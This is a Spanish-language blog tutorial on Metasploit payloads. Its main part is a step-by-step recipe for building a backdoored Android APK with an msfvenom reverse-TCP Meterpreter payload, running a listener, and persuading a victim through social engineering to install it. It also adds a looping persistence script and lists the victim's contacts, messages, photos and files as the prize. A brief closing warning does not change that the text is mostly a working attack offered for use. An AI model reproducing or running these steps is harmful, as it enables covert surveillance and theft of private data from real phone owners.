Payloads con metasploit-framework

0

 Payloads con metasploit-framework

El día de hoy veremos un tema bastante amplio pero solo mostraremos lo principal y solo un método. Pará primer lugar veremos que significa payload. 

Payload

La herramienta llamada Metasploit contiene distintos exploit (Vulnerabilidad) y payloads (La carga que se ocupa para esa vulnerabilidad). Metasploit cuenta con 1800 exploit y con más de 1000 payloads, según un análisis realizado en el año 2018.

En metasploit existen tres tipos de payload los cuales son:

💀Singles:

Son payloads únicos y completamente independientes. Un payload single es algo tan simple como agregar un usuario al sistema de destino o ejecutar calc.exe. Lo que más destaca en este tipo de payloads es que son completamente autónomos. 

💀Stagers:

Se encargan de configurar una conexión de red entre el atacante y la víctima. El resultado son varios stagers similares esto para evitar errores. Metasploit se encargará de usar el mejor cuando sea posible y recurrirá a uno menos preferido al momento en el que sea necesario. 

💀Stages:

Son componentes de los payloads, los cuales se descargan por el módulo stagers. Esto proporciona con funciones más avanzadas sin límite de tamaño, un claro ejemplo es el payload llamado Meterpreter.

En este video se muestra más a detalle la información:


Pasos para infectar una apk con metasploit por medio de un payload meterpreter.

1. Procedemos a abrir una terminal en nuestro sistema "Kali Linux" y colocamos el siguiente comando:

>msfvenom - p android/meterpreter/reverse_tcp lhost=192.168.0.4 lport=4444 R > /root/desktop/backdoor.apk


Lo que se hace es llamar a la librería msfvenom y con - p indicamos el tipo de payload el cual se utilizará, con host indicamos nuestra ip y con lport el puerto que se dejara en modo escucha. Posteriormente colocamos R > lo cual indicará la ruta en donde se guardara el apk, el apk se debe de guardar con el nombre y con terminación .apk.


2. Después para el momento en el que la persona instale el apk nos de nuestra meterpreter debemos configurar el modo escucha:
>msfconsole - q
>use multi/handler
>set payload 

android/meterpreter/reverse_tcp
Configuramos el puerto y la ip que usamos anteriormente:
>set lhost 192.168.0.4
>set lport 4444
>exploit -j


3. Enviar el apk a la víctima y lograr convencer que lo instale, para ello se puede ocupar un poco de ingeniería social. Pará ver las secciones recurrimos al codigo:
>sessions -i


Aunque como solo tendremos una al momento de que la víctima instale la apk utilizaremos:
>sessions -I 1


Pará ver todas las opciones que tenemos necesitaremos solo conlocar:
>help


Persistencia en el payload


1. Nos dirigimos a nuestro directorio sdcard de nuestro android:
>cd /
>cd /sdcard/Download/


2. Abrimos una terminal en nuestro sistema Kali Linux y escribimos lo siguiente:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


3. Nos dirigimos a nuestra meterpreter y vamos al directorio /sdcard/Download/ y escribimos lo siguiente:
>upload /root/Desktop/persistence.sh


4. Abrimos una Shell poniendo:
>shell


5. Vamos a la ruta de nuestro .sh y lo ejecutamos:
>cd /
>cd /sdcard/Download/
>sh persistence.sh


Ejecuntandolo se reiniciará el dispositivo android y perderemos conexión temporalmente, debemos volver a configurar el modo escucha y listo, al momento en el que se encienda el dispositivo volveremos a tomar el control lo cual nos dará acceso a:

# Ver sus contactos
# Ver mensajes y llamadas
# Ver imágenes y videos
# Ver archivos de la victima
# Etc. 


Esta es una de las razones por la cual no debemos instalar aplicaciones o archivos desconocidos. Les agradesco su atención.

Hasta pronto Cibernautas

Páginas consultadas:

Tipos de Payload

OpenWebinars

Hackingpills

Publicar un comentario

0Comentarios
Publicar un comentario (0)